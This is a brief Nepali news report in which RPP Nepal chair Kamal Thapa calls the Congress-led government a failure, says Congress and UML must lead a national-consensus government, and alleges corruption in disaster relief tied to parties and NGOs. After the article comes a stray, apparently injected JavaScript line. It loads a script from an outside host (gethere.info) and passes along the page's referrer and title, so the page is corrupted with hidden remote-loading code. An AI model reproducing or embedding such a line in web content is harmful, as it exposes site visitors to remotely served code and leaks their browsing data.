राप्रपा नेपालका अध्यक्ष कमल थापाले कांग्रेस नेतृत्वको सरकार पूर्णरुपमा असफल भएको बताएका छन्। उहाँले सरकार असफल भएकै कारण राष्ट्रिय सहमतिको सरकार उठान भएको बताउनु भएको छ। रफत सञ्चार क्लव भक्तपुर गरेको साक्षतकार कार्यक्रममा बोल्दै थापाले राष्ट्रिय सरकारको निर्माण काँग्रेस र एमालेमै निर्भर भएको बताउनुभयो। उहाँले एमाले र काँग्रेसले एकतालाई कायम गर्दै संविधान निमार्णमा अग्रसर बन्नु पर्नेमा जोड दिनुभयो। दुई तिहाई बहुमतको बलियो र स्थिर सरकार काँग्रेस र एमालेकै भएकाले राष्ट्रिय सहमतिको सरकार बनाउन पनि उनीहरुकै जिम्मेवारी रहेको थापाको भनाइ छ।

थापाले राहत वितरणमा राजनीतिक दललेसमेत घोटला गरेको आरोप लगाउनुभयो। पद्धती र प्रणाली बिग्रनुसाथै सरकारको प्रभाकारीता अभाबकै कारण अन्तराष्ट्रि समुदायले नपत्याउनु अर्को कारण भएको उहाँको भनाई थियो। उहाले नेपालका ठूला राजनीतिक दल काँग्रेस एमाले र एकीकृत माओबादीमा देखिएको एनजीओ र आईएनजीओको प्रभावले विपतका समयमा समेत राहत वितरणमा समस्या देखिएको बताउनु भयो ।

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;